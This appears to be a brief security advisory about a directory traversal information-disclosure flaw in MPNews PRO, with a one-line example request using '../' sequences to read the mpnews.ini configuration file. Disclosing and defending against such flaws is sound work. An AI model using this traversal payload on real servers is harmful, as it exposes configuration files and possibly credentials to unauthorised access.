• info
• discussion
• exploit
• solution
• references

MPNews PRO Directory Traversal Information Disclosure Vulnerability

This issue can be exploited by issuing a request for a known system file using an HTTP request formatted as shown below.

http://www.example.org/./.././../mpnews.ini